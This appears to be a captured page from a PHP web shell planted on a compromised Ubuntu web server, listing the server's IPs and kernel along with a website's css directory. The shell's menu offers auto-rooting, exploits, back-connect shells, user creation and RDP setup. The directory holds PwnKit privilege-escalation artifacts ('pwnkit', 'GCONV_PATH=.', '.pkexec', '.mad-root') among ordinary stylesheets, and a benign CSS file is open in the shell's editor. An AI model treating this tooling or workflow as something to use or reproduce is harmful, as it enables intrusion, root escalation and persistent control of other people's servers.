Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.221.248.140
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
website /
bkmh /
css /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-sr-x
GCONV_PATH=.
[ DIR ]
drwxr-sr-x
.mad-root
0
B
-rw-r--r--
1-Genericons.eot
21.85
KB
-rwxrwxrwx
1-Genericons.svg
75.18
KB
-rwxrwxrwx
1-Genericons.ttf
21.67
KB
-rwxrwxrwx
1-bootstrap-grid.min.css
8.33
KB
-rwxrwxrwx
1-cfa.style.min.css
874
B
-rwxrwxrwx
1-cookieconsent.min.css
3.97
KB
-rwxrwxrwx
1-font-awesome.min.css
23.15
KB
-rwxrwxrwx
1-fontawesome-webfont.eot
59.34
KB
-rwxrwxrwx
1-fontawesome-webfont.svg
306.6
KB
-rwxrwxrwx
1-fontawesome-webfont.ttf
119.23
KB
-rwxrwxrwx
1-fontawesome-webfont.woff
69.83
KB
-rwxrwxrwx
1-fontawesome-webfont.woff2
55.45
KB
-rwxrwxrwx
1-genericons.css
27.59
KB
-rwxrwxrwx
1-ie.css
0
B
-rwxrwxrwx
1-ie7.css
0
B
-rwxrwxrwx
1-ie8.css
0
B
-rwxrwxrwx
1-style.css
43.11
KB
-rwxrwxrwx
1-theme.css
310.18
KB
-rwxrwxrwx
1-venobox.css
11.19
KB
-rwxrwxrwx
2-style.css
2.18
KB
-rwxrwxrwx
3-style.css
41.93
KB
-rwxrwxrwx
Genericons.eot
21.85
KB
-rwxrwxrwx
Genericons.svg
75.18
KB
-rwxrwxrwx
Genericons.ttf
21.67
KB
-rwxrwxrwx
animate.min.css
16.56
KB
-rwxrwxrwx
bootstrap-grid.min.css
8.33
KB
-rwxrwxrwx
cfa.style.min.css
874
B
-rwxrwxrwx
cookieconsent.min.css
3.97
KB
-rwxrwxrwx
flexslider-icon.eot
2.03
KB
-rwxrwxrwx
flexslider-icon.svg
2.3
KB
-rwxrwxrwx
flexslider-icon.ttf
1.85
KB
-rwxrwxrwx
flexslider-icon.woff
1.24
KB
-rwxrwxrwx
flexslider.min.css
4.64
KB
-rwxrwxrwx
font-awesome.min.css
23.13
KB
-rwxrwxrwx
fontawesome-webfont.eot
59.34
KB
-rwxrwxrwx
fontawesome-webfont.svg
306.6
KB
-rwxrwxrwx
fontawesome-webfont.ttf
119.23
KB
-rwxrwxrwx
fontawesome-webfont.woff
69.83
KB
-rwxrwxrwx
fontawesome-webfont.woff2
55.45
KB
-rwxrwxrwx
genericons.css
27.58
KB
-rwxrwxrwx
gma.style.css
322
B
-rwxrwxrwx
ie.css
0
B
-rwxrwxrwx
ie7.css
0
B
-rwxrwxrwx
ie8.css
0
B
-rwxrwxrwx
photogallery.css
56
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
selectstyle.css
2.37
KB
-rwxrwxrwx
style.css
2.18
KB
-rwxrwxrwx
theme.css
310.17
KB
-rwxrwxrwx
venobox.css
11.19
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : selectstyle.css
:root { --primary: #111; --secondary: #fd0; } * { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: sans-serif; background-color: var(--secondary); } .select-box { position: relative; z-index: 1; /* width: 26rem; */ /* margin: 7rem auto; */ } .select-box input { width: 100%; padding: 0.5rem 0.2rem; font-size: 1.1rem; outline: none; } input[type="tel"] { border-radius: 0 0.5rem 0.5rem 0; } .select-box input:focus { border: 0.1rem solid var(--primary); } .selected-option { /* background-color: #eee; */ border-radius: 0.5rem; overflow: hidden; display: flex; justify-content: space-between; align-items: center; } .selected-option div { position: relative; width: 6rem; padding: 0 2.8rem 0 0.5rem; text-align: center; cursor: pointer; } .selected-option div::after { position: absolute; content: ""; right: 0.8rem; top: 50%; transform: translateY(-50%) rotate(45deg); width: 0.8rem; height: 0.8rem; border-right: 0.12rem solid var(--primary); border-bottom: 0.12rem solid var(--primary); transition: 0.2s; } .selected-option div.active::after { transform: translateY(-50%) rotate(225deg); } .select-box .options { position: absolute; top: 3rem; width: 100%; background-color: #fff; border-radius: 0.5rem; display: none; } .select-box .options.active { display: block; } .select-box .options::before { position: absolute; content: ""; left: 1rem; top: -1.2rem; width: 0; height: 0; border: 0.6rem solid transparent; border-bottom-color: var(--primary); } input.search-box { background-color: var(--primary); border: 1px solid; /* color: #fff; */ border: 0.1rem solid transparent; border-radius: 0.5rem 0.5rem 0 0; /* padding: 1.4rem 1rem; */ } .select-box ol { list-style: none; max-height: 23rem; overflow: overlay; } .select-box ol::-webkit-scrollbar { width: 0.6rem; } .select-box ol::-webkit-scrollbar-thumb { width: 0.4rem; height: 3rem; background-color: #ccc; border-radius: 0.4rem; } .select-box ol li { padding: 0.7rem; display: flex; justify-content: space-between; cursor: pointer; } .select-box ol li.hide { display: none; } .select-box ol li:not(:last-child) { border-bottom: 0.1rem solid #eee; } .select-box ol li:hover { background-color: lightcyan; } .select-box ol li .country-name { margin-left: 0.4rem; }
Close